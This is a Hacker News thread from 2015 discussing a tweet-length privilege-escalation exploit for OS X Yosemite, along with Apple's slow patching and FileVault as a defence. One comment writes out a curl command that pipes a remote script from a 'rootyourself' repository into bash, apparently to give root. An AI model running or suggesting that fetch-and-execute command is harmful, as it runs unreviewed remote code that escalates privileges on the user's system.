Hacker News new | past | comments | ask | show | jobs | submit login
Exploit to get root on OS X 10.10 fits in a tweet (theregister.co.uk)
125 points by odedgolan on July 23, 2015 | hide | past | favorite | 33 comments



"Introducing a new command line feature to restore access after losing your password"...


I know you're making a joke, but it's trivially easy to reset the admin password on a computer.

https://discussions.apple.com/docs/DOC-4101


Changing your own password is not the same as acquiring root privileges.


Oh yeah I know, I wasn't trying to say it was. It was just a random aside based on the parents comment.

On that point though, If you can change the password of an admin account on any Mac (that doesn't have filevault on), then you can use that to obtain root privileges on any Mac.


Sure, but that requires you to either already have an admin password, or be able to reboot the machine into recovery mode and retain control of it (which typically implies actual physical access).

The privilege escalation exploit mentioned in the OP, while technically not remotely exploitable, can be used by malware with lower privileges (i.e. malware running as an unprivileged user, which got onto the machine either through a remote exploit or some sort of drive-by download) to silently elevate itself to root. That's something that shouldn't be possible.


Enabling FileVault is an easy countermeasure.


How so? FileVault is typically not tied to the root password, but to a primary user's password, which you don't even need root to change.


You cannot reset any user password on a FileVault disk because it's encrypted.


Yup. 'User accounts' have never been a proper security measure.


I like to think of this as a good example of why not to use curl to execute bash scripts.

  curl -s https://raw.githubusercontent.com/nchelluri/rootyourself/master/doh.sh | bash


If you'd like to force yourself to at least look at a script before piping it in, there's shed [0]

[0] https://github.com/mplewis/shed



I always get bummed out over @i0n1c's tweets, so many security issues that are just ignored by apple.

Anyone have stats on # of exploits per type of OS X. I would want to see how many known security updates were pushed during 10.6 era vs now. At least in the 10.6 era, the OS you were using ( if it was a previous generation) was still getting security updates.


It's really upsetting and ousting Forstall did nothing to revive or unify the iOS/OSX teams...

And it's easy to gloss over these issues when they're crafted into such a carefully and intentionally designed piece of modern art -- except many of the core libraries sitting atop that hardware are where such quality has been overlooked. I think that's the antithesis of the philosophy of 'detail' that arguably brought apple back from the brink last time...

Usability and simplifying processes is great and all, but if enough of these issues seep in it could destroy the core assumption of quality which is what the company truly subsists on... Surely Cook must realize this by now? Desktop isn't the future, we know, but neglect advanced users and you only stand to lose relevance.

[edit] A slightly more crude analogy: it's a bit like dressing up a Ford Pinto in the body kit of a Ferrari -- you'll cross the line in style, but eventually you're going to get burned.


Maybe its an issue with scope, and targeting specific issues that people have. Couple of advance users have issues with security not a big issue, Taylor Swift has issues with payment of artists, next day issue is addressed.

I guess its the illusion of caring.

You would think that the core would need to be solid, while the outsides would be constantly polished. I don't believe the company has been on the path of quality since the release of 10.7-10.9 and the all the hardware issues that came through during that era, till now.

While i agree that desktops are not the future, and mobile is increasingly picking up momentum, mobile to me is like the horse with a blinding mask on, this is what you get, and ONLY this. Even more so with the case of Apple.

I guess I came around full circle to bite myself. I want new things with mobile, and I want there to be options. But at the same time I want something that is quality. Should I have to sacrifice one for the other? Or worse, wait forever to be able to do something, at which when i get it i don't even care anymore because I need to do something else now.

GNU looks so nice right now.


Lots of exploits fit in a tweet. Lots don't. That really doesn't have anything to do with how "bad" or "trivial" it is.


"'Apple ships fixes for security in beta versions of future products, but does not fix current versions,' Esser noted."

Is that really a thing? Apple doesn't ship security updates? Or is that just trolling?


They've issued security updates as far back as Mountain Lion as recently as June 30.

https://support.apple.com/en-us/HT201222


Yes, Apple does not patch old versions of iOS or OSX.

All iPhone 2G, 3G and 4 are all vulnerable to root code execution flaws (some exploitable from the web browser) and do not receive updates.


Aren't all iPhones that can be jailbroken subject to root code execution flaws?


Yep. The 2G and 3G ones are particularly bad because there's a public toolchain that gets you from web browser to root, for the 4 and later you normally need USB access to some degree.


Apple has gotten absolutely terrible at fixing bugs, they're obviously not interested. Changing the background colour in iTunes generates more revenue than fixing “invisible” security holes.


that's pretty bad. I just tested it, and it does, indeed work.


Remove the last line in your /etc/sudoers with visudo if you don't want permanent passwordless sudo on your account.


Pretty new to OS X, when will Yosemite expect a fix? Is El Capitan Beta stable enough to be a better bet?


You can never be absolutely sure with Apple, but for comparison, the Shellshock exploit was patched on OS X within a week.


sudo: unable to stat /etc/sudoers: Permission denied sudo: no valid sudoers sources found, quitting


What is that domain? This is a Register post, here it was submitted as http://www.theregister.stfi.re/2015/07/22/os_x_root_hole/?sf... which looks like social media tracking crap.

http://www.theregister.co.uk/2015/07/22/os_x_root_hole/ is the actual URL.


The domain is from http://startafire.com/

> Get the full value from curated content you share on social media Automatically add your presence and promote your content with every external link you share


Thanks. We changed the URL to that from http://www.theregister.stfi.re/2015/07/22/os_x_root_hole/?sf.... We banned stfi.re.


Thank you!


Looks like it. Flagged.


Posted yesterday, but without much discussion: https://news.ycombinator.com/item?id=9933639.




Join us for AI Startup School this June 16-17 in San Francisco!

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: